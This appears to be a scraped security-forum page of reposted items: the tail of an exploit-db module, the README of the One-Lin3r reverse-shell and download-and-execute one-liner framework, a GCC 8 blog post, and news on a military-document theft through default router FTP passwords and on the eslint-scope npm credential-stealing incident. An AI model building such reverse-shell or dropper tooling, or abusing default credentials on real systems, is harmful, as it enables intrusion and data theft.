ensure_clean_exploit_destination ensure_clean_payload_destination end end attr_reader :exploit_name attr_reader :payload_name attr_reader :payload_exe attr_reader :temp_path attr_reader :payload_path attr_reader :exploit_path end Sursa: https://www.exploit-db.com/exploits/45024/?rss&amp;utm_source=dlvr.it&amp;utm_medium=twitter
  12. Nytro


    One-Lin3r One-Lin3r is simple and light-weight framework inspired by the web-delivery module in Metasploit. It consists of various one-liners that aids in penetration testing operations: Reverser: Give it IP & port and it returns a reverse shell liner ready for copy & paste. Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste. Other: Holds liners with general purpose to help in penetration testing (ex: Mimikatz, Powerup, etc...) on the trending OSes (Windows, Linux, and macOS) "More OSes can be added too". Features Search for any one-liner in the database by its full name or partially. You can add your own liners by following these steps to create a ".liner" file.Also you can send it to me directly and it will be added in the framework and credited with your name 😄. Autocomplete any framework command and recommendations in case of typos (in case you love hacking like movies 😆). Command line arguments can be used to give the framework a resource file to load and execute for automation. The ability to reload the database if you added any liner without restarting the framework. You can add any platform to the payloads database just by making a folder in payloads folder and creating a ".liner" file there. More... The payloads database is not big now because this the first edition but it will get bigger with updates and contributions. Screenshots (Not updated) Usage Commandline arguments usage: one-lin3r [-h] [-r R] [-x X] [-q] optional arguments: -h, --help show this help message and exit -r Execute a resource file (history file). -x Execute a specific command (use ; for multiples). -q Quit mode (no banner). Framework commands Command Description -------- ------------- help/? Show this help menu list/show List payloads you can use in the attack. search <Keyword> Search payloads for a specific one use <payload> Use an available payload info <payload> Get information about an available payload banner Display banner reload/refresh Reload the payloads database check Prints the core version and database version then check for them online. history Display command line most important history from the beginning save_history Save command line history to a file exit/quit Exit the framework Installing and requirements To make the tool work at its best you must have : Python 3.x or 2.x (preferred 3). Linux (Tested on kali rolling), Windows system, mac osx (tested on 10.11) The requirements mentioned in the next few lines. Installing +For windows : (After downloading ZIP and upzip it) python -m pip install ./One-Lin3r-master one-lin3r -h +For Linux : git clone https://github.com/D4Vinci/One-Lin3r.git apt-get install libncurses5-dev pip install ./One-Lin3r one-lin3r -h Updating the framework or the database On Linux while outside the directory cd One-Lin3r && git pull && cd .. pip install ./One-Lin3r --upgrade On Windows if you don't have git installed, redownload the framework zipped! Contact Twitter Donation If you liked my work and want to support me, you can give me a cup of coffee bitcoin address: 1f4KfYikfqHQzEAsAGxjq46GdrBKc8jrG Disclaimer One-Lin3r is created to help in penetration testing and it's not responsible for any misuse or illegal purposes. Copying a code from this tool or using it in another tool is accepted as you mention where you get it from 😄. Pull requests are always welcomed Sursa: https://github.com/D4Vinci/One-Lin3r#one-lin3r-----
  13. GNU* Compiler Collection 8 (GCC 😎 - Transitioning to a new compiler 27 Jun, 2018 By Victor Rodriguez Bahena & filed under Maintenance Every year, the Linux* community awaits the release of a new version of the GNU* Compiler Collection. The collection includes front ends for C , C++ , Objective-C, Fortran , Ada, and Go, as well as libraries for these languages. The GCC community works hard to provide usability improvements, bug fixes, new security features, and performance improvements. The GCC 8 Release Series changes list includes a full list of changes, new features, and fixes for this release. This blog article uses code examples to show how to use the following new compiler features: Interprocedural optimization improvements Control-flow enforcement technology Changes in loop nest optimization flags Interprocedural optimization improvements As the Linux community continues to redefine the boundaries of what is possible in a Linux distribution running on new silicon, performance plays an increasingly important role in the industry. Optimizations at compile time have been playing an increasing role over the last years. Interprocedural Optimization (IPO) is an automatic, multi-step process that allows the compiler to analyze your entire code to determine where you can benefit from specific optimizations in programs containing many frequently used functions. In the new GCC 8, there are two major changes for interprocedural optimizations. The first one is reworked run-time estimation metrics, which leads to more realistic guesses driving inlining and cloning heuristics. This is an internal change on how GCC represents frequencies of basic blocks of code. In the previous GCC 7 version, it was prone to overflow. Block frequency is a relative metric that represents the number of times a block executes. The ratio of a block frequency to the entry block frequency is the expected number of times the block will execute per entry to the function. A basic block (BB) is a sequence of instructions with a single entry at the start and a single exit at the end. These blocks are linked together with the Control Flow Graph (CFG). The following figure shows a simple If statement and the corresponding CFG generated with gcc test.c -fdump-tree-all-graph which generates dot files. Figure 1. Simple If and its basic control flow graph The change made in GCC 8 to improve the accuracy basic blocks count can affect all optimizations (including Profile Guided Optimizations, inlining, and cloning heuristics). Basic block frequencies is a core component in compiler optimizations. Another important change in GCC 8 is the Interprocedural Analysis (IPA). IPA is a form of dataflow analysis between functions. As we know, GCC builds a “call graph” recording which functions call other functions. In GCC 8, the ipa-pure-const pass is extended to propagate the malloc attribute. The keyword __attribute__ allows you to specify special attributes when making a declaration. This keyword is followed by an attribute specification inside double parentheses. One of these is the malloc attribute: __attribute__((malloc)) The malloc attribute is used to inform the compiler that a function may be treated as any non-NULL pointer. Because of this, the return of the function cannot alias any other pointer valid when the function returns. In compilers, aliasing is the case where the same memory location can be accessed using different names. It is vitally important that a compiler can detect which accesses may alias each other, so that optimizations can be performed correctly. The following example shows the use of the malloc attribute: In GCC 8, the corresponding warning option Wsuggest-attribute=malloc emits a diagnostic for functions that can be annotated with the malloc attribute. $ gcc malloc.c -Wsuggest-attribute=malloc malloc.c: In function ‘foo’: malloc.c:6:8: warning: function might be candidate for attribute ‘malloc’ if it is known to return normally [-Wsuggest-attribute=malloc] void * foo(int size){ ^~~ When we enable the __attribute__((malloc)), the code looks like the following example: After this, the following compilation command line works without warnings: $ gcc malloc.c -Wsuggest-attribute=malloc As we have seen, Interprocedural Optimization (IPO) allows the compiler to analyze your entire code and propose optimizations. The improvements that GCC 8 has done on this technology will play an important role on the performance of end user's applications. Control-flow enforcement technology Another important section for compilers is security. One of the attacks that GCC 8 helps to prevent are Return Oriented Programming (ROP ) and call/jmp-oriented programming (COP/JOP). These attack methods have the following common elements: Diverting the control flow instruction (e.g. RET, CALL, JMP) from its original target address to a new target (via modification in the data stack or in the register). Attackers set a code module with execution privilege and contain small snippets of code sequence. This sequence has the characteristic that at least one instruction in the sequence is a control transfer instruction that depends on data either in the return stack or in a register for the target address. GCC 8 introduces a new option -fcf-protection =[full | branch | return | none] that performs code instrumentation to increase program security. When used, the fcf-protection option checks that target addresses of control-flow transfer instructions (such as indirect function call, function return, indirect jump) are valid. The new fcf-protection option option enables support for the Control-Flow Enforcement Technology (CET) feature in future Intel CPUs by enabling instrumentation of control-flow transfers to increase program security. The fcf-protection option checks for valid target addresses of control-flow transfer instructions (such as indirect function call, function return, and indirect jump). For example, the instruction at the target of an indirect jump must be an ENDBRANCH instruction , a particular form of NOP. This prevents diverting the flow of control to an unexpected target. As an additional protection, the Clear Linux project provides the option: mzero-caller-saved-regs =[skip | used | all]. This option clears caller-saved general registers upon function return. This is intended to make threats such as ROP, COP, and JOP attacks much harder. Changes in loop nest optimization flags There are a few changes in the optimization flags for GCC 8. The floop-interchange flag applies a classical loop nest optimization and is enabled by default at -O3 optimization level and above. Consider the following code: int k[1000, 100]; for (int y = 0; y < 100; y++) for (int x = 0; x < 1000; x++) k[x,y]=x*y; In C, arrays are stored in row major order. At the beginning of our sample code execution, when the processor accesses an array element for the first time, it retrieves an entire cached line of data from main memory to the cache memory. If the rest of the data will be used soon, this is a major performance boost. If on the other hand, the rest of the data is not used, this is a net performance loss. If the array is accessed incorrectly, we will see this loss. When the floop-interchange flag is used, this code is transformed to: for (int x = 0; x < 1000; x++) for (int y = 0; y < 100; y++) k[x,y] = x*y; In this example, the floop-interchange flag exchanges the loops so the array is accessed in the optimal order, because the variable used in the inner loop switches to the outer loop. We can see this in the transformed code, where it accesses k[0,0], k[0,1], … k[0, 99], k[1,0] …k[999, 99] rather than k[0,0], k[1,0], k[ 2,0] … k[999,0], k[0, 1] … k[999, 99]. The memory controller is optimized for consecutive memory locations. In this scenario, the transformed code accesses memory consecutively instead of reading widely differing locations. Conclusion The Linux community continues to redefine the boundaries of what is possible in a Linux distribution running on new silicon. Both performance and security play an increasingly important role in the industry. In the Clear Linux Project for Intel Architecture, we decided to use and improve the latest GCC compiler technology to boost the performance and security of a Linux-based system for open source developers. We encourage users to employ the latest technologies that can improve applications for customers by boosting their performance and also providing a more robust layer of protection against security attacks. Sursa: https://clearlinux.org/blogs/gnu-compiler-collection-8-gcc-8-transitioning-new-compiler
  14. By Catalin Cimpanu July 11, 2018 04:07 AM 0 A hacker is selling sensitive military documents on online hacking forums, a security firm has discovered. Some of the sensitive documents put up for sale include maintenance course books for servicing MQ-9 Reaper drones, various training manuals describing comment deployment tactics for improvised explosive device (IED), an M1 ABRAMS tank operation manual, a crewman training and survival manual, and a document detailing tank platoon tactics. Hacker asking between $150 and $200 for the lot US-based threat intelligence firm Recorded Future discovered the documents for sale online. They say the hacker was selling the data for a price between $150 and $200, which is a very low asking price for such data. Recorded Future says it engaged the hacker online and discovered that he used Shodan to hunt down specific types of Netgear routers that use a known default FTP password. The hacker used this FTP password to gain access to some of these routers, some of which were located in military facilities, he said. Based on the documents and details he shared online and with researchers in private conversations, one such location was the 432d Aircraft Maintenance Squadron Reaper AMU OIC, stationed at the Creech AFB in Nevada. Here, he used access to the router to pivot inside the base's network and gain access to a captain's computer, from where he stole the MQ-9 Reaper manual and a list of airmen assigned to Reaper AMU. MQ-9 Reaper drones are some of the most advanced drones around and are used by the US Air Force, the Navy, the CIA, the Customs and Border Protection Agency, NASA, and the militaries of other countries. The hacker didn't reveal from where he stole the other documents, but based on the information they contain experts believe that they were most likely taken from the Pentagon or from a US Army official. "While such course books are not classified materials on their own, in unfriendly hands, they could provide an adversary the ability to assess technical capabilities and weaknesses in one of the most technologically advanced aircrafts," Andrei Barysevich, Director of Advanced Collection at Recorded Future said. Incident caused by use of router default FTP credentials The incident could have very easily been prevented if the military base's IT team would have followed best practices and changed the router's default FTP credentials.. The issue with Netgear routers using a set of default FTP credentials is known since 2016 when a security researcher raised the alarm about it. Netgear responded by putting up a support page with information on how users could change their routers' default FTP password. Recorded Future said that at the time of writing, there are more than 4,000 such routers (Netgear Nighthawk R7000) available online via "smart device" search engines like Shodan. The hacker also bragged about accessing footage from an MQ-1 Predator flying over Choctawhatchee Bay in the Gulf of Mexico. This isn't something new, though, as the US government agencies have been known to leak those feeds once in a while. Recorded Future said it reported the finding to US authorities, which are now investigating the hacks. Researchers hinted at also discovering the hacker's country of origin, albeit they did not make the information public. Image source: Wikimedia Foundation, Recorded Future Sursa: https://www.bleepingcomputer.com/news/security/hacker-steals-military-docs-because-someone-didn-t-change-a-default-ftp-password/
  15. By Catalin Cimpanu July 12, 2018 12:10 PM 0 A hacker has gained access to a developer's npm account and injected malicious code into a popular JavaScript library, code that was designed to steal the npm credentials of users who utilize the poisoned package inside their projects. The JavaScript (npm) package that got compromised is called eslint-scope, a sub-module of the more famous ESLint, a JavaScript code analysis toolkit. Hacker gained access to a developer's npm account The hack took place on the night between July 11 and 12, according to the results of a preliminary investigation posted on GitHub a few hours ago. "One of our maintainers did observe that a new npm token was generated overnight (said maintainer was asleep)," said Kevin Partington, ESLint project member. Partington believes the hacker used the newly-generated npm token to authenticate and push a new version of the eslint-scope library on the npm repository of JavaScript packages. The malicious version was eslint-scope 3.7.2, which the maintainers of the npm repository have recently taken offline. Malicious code steals npm credentials "The published code seems to steal npm credentials, so we do recommend that anyone who might have installed this version change their npm password and (if possible) revoke their npm tokens and generate new ones," Partington recommended for developers who used esling-scope. In an email to Bleeping Computer, npm CTO C.J. Silverio put the incident into perspective. "We determined that access tokens for approximately 4,500 accounts could have been obtained before we acted to close this vulnerability. However, we have not found evidence that any tokens were actually obtained or used to access any npmjs.com account during this window," Silverio said. "As a precautionary measure, npm has revoked every access token that had been created prior to 2:30 pm UTC (7:30 am California time) today. This measure requires every registered npm user to re-authenticate to npmjs.com and generate new access tokens, but it ensures that there is no way for this morning’s vulnerability to persist or spread. We are additionally conducting a full forensic analysis to confirm that no other accounts were accessed or used to publish unauthorized code. "This morning’s incident did not happen because of an npmjs.com breach, but because of a breach elsewhere that exposed a publisher’s npm credentials. To mitigate this risk, we encourage every npmjs.com user to enable two-factor authentication, with which this morning’s incident would have been impossible," Silverio added. The developer who had his account compromise has changed his npm password, enabled two-factor authentication, and generated new tokens to access his existing npm libraries. The incident is of great importance because the stolen npm credentials can be used in a similar manner to what happened now. The hacker can use any of the stolen npm credentials to poison other JavaScript libraries that are made available via npm — a.k.a. the Node Package Manager, the semi-official package manager for the JavaScript ecosystem. Similar incidents have happened in the past year This is the third incident in the past year when a hacker has inserted malicious code in an npm package. The first such incident happened in August 2017 when the npm team removed 38 JavaScript npm packages that were caught stealing environment variables from infected projects. In May 2018, someone tried to hide a backdoor in another popular npm package named getcookies. Similar incidents with malware ending up in package repositories have happened with Python's PyPI [1, 2], Docker Hub, Arch Linux AUR, and the Ubuntu Store. UPDATE July 13, 02:45 AM ET: The ESLint team has published the final results of their investigation. They say that besides the esling-scope 3.7.3 package, the attacker also compromised another package, eslint-config-eslint, pushing out a malicious module eslint-config-eslint 5.0. Article updated with comments from npm CTO C.J. Silverio. Sursa: https://www.bleepingcomputer.com/news/security/compromised-javascript-package-caught-stealing-npm-credentials/